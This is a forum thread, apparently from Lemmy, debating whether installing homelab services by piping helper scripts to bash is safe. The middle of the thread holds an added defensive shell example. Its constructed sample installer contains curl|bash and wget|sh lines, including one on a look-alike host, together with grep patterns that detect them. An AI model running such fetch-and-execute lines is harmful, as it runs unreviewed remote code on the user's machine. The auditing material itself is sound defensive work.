I only discovered this recently, and it’s very handy.
Piping scripts directly to bash is a security risk. You can always download the scripts, inspect them and run locally if you so choose.
Heellll no, the scripts are publicly available to read over if you’re sketched out. They save you so much time to actually get to using the service. 98% of my homelab is from these same helper scripts too.
RIP tteck
I don’t like that an adversary could modify that link or its contents without much detection or any logging.
When you compare it to package managers that have immutable versioning that’s a big downfall. If someone were modifying pypi or npm packages I would be surprised if it went undetected.
Realistically, is that an issue? Probably not. But I do try and reduce my exposure when I can.
Have you ever looked at what was once tteck scripts? They’re a spaghetti of calls to other scripts. It’s not pretty. And not intuitive to audit.
Wtf you’re my opposite D:
I did and had a decent time with ctrl shift F’ing around. Took a moment since bash isn’t my strong suit.
They work, so what is your objection?
If you are worried, pipe it into chatgpt with the prompt
“tell me why this script is safe to use”
I thought I was being clear that I have audited some of the scripts. They are built referencing other scripts instead of functions, and these rely on URLs. It’s difficult to follow.
Don’t ask chatgpt to audit code.
You can install with package managers and include with it a helper script to setup the service. No big deal.
But can you spot the difference between
http://myservice.com/script.sh
and http://myserv1ce.com/script.sh
if you use a font that doesn’t make it clear? If you get people used to just copy/pasting/running scripts then there’s a risk they’ll run something entirely different by accident. There’s no good reason to install things this way.
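An added example, not written by anyone in this thread: one way to do the "download, inspect, run locally" step so that it also surfaces the two problems raised above, scripts that pull in other scripts by URL and a look-alike hostname. The function names and the `example.org` hosts are hypothetical, and the sample installer is constructed.

```sh
#!/bin/sh
# Added example. Hostnames and the sample script below are constructed.

# Save the script to a file (never pipe it to a shell) and print its SHA-256,
# so the copy that was reviewed is the copy that later gets run.
fetch_for_review() {  # usage: fetch_for_review URL DEST
  curl -fsSL -o "$2" "$1" && sha256sum "$2"
}

# Distinct hosts the script references through http(s) URLs, lowercased.
list_hosts() {  # usage: list_hosts FILE
  grep -oE 'https?://[A-Za-z0-9.-]+' "$1" | sed -E 's#^https?://##' |
    tr 'A-Z' 'a-z' | sort -u
}

# Numbered lines that download something and execute it in the same step
# (curl|bash, wget|sh, source <(curl ...), bash -c "$(curl ...)").
nested_fetches() {  # usage: nested_fetches FILE
  grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh|(<|\$)\((curl|wget)' "$1" || true
}

# Print hosts that are not an exact match for an allowlisted name; status 1
# if any are found. Exact comparison catches look-alikes the eye misses.
unexpected_hosts() {  # usage: unexpected_hosts FILE ALLOWED_HOST...
  file=$1; shift; bad=0
  for host in $(list_hosts "$file"); do
    ok=0
    for allowed in "$@"; do
      if [ "$host" = "$allowed" ]; then ok=1; fi
    done
    if [ "$ok" -eq 0 ]; then echo "$host"; bad=1; fi
  done
  return "$bad"
}

# Constructed sample: a helper script that chains to other remote scripts.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
#!/bin/bash
source <(curl -fsSL https://scripts.example.org/lib/build.func)
curl -fsSL https://scripts.example.org/install/app.sh | bash
wget -qO- http://scr1pts.example.org/extra.sh | sh
echo "done"
EOF

echo "Lines that execute remote code:"; nested_fetches "$SAMPLE"
if ! unexpected_hosts "$SAMPLE" scripts.example.org; then
  echo "^ not on the allowlist: read before running" >&2
fi
```

Each line reported by `nested_fetches` names another script that has to be fetched and reviewed the same way before the first one is run.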
Some people have jobs and families to attend and can’t afford weeks figuring out linux idiosyncrasies. This works.
Yes, it would be nice to have an official LXC repository, but we don’t.
Tell the LXC people we should have had one already instead of splitting hairs with docker.
https://discuss.linuxcontainers.org/t/where-can-i-find-the-biggest-lxc-container-repository/14946
But this is a trusted source with years of credibility. Why would any sensible competent tech user copy paste from other places because this one worked?
You’ll be pissed when you hear about Linux game server manager then. It’s all helper scripts over https
Because sites like this and people like you are normalizing the practice. I have seen numerous curl | sh commands pasted on lemmy telling people “how easy it is to install blank”.